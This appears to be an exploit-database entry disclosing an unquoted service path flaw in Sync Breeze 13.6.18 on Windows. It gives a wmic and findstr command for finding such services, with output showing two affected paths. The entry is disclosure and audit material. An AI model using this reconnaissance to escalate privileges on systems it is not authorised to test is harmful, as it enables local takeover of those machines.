Sync breeze 13.6.18 multiple unquoted service path Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-06-17 |
Type : local |
Platform : windows
This exploit / vulnerability Sync breeze 13.6.18 multiple unquoted service path is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Sync Breeze 13.6.18 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 16-06-2021
# Vendor Homepage: https://www.syncbreeze.com/
# Software Links:
# https://www.syncbreeze.com/setups_x64/syncbreezesrv_setup_v13.6.18_x64.exe
# https://www.syncbreeze.com/setups_x64/syncbreezeent_setup_v13.6.18_x64.exe
# Tested Version: 13.6.18
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Sync Breeze Server Sync Breeze Server C:\Program Files\Sync Breeze
Server\bin\syncbrs.exe Auto
Sync Breeze Enterprise Sync Breeze Enterprise C:\Program Files\Sync
Breeze Enterprise\bin\syncbrs.exe Auto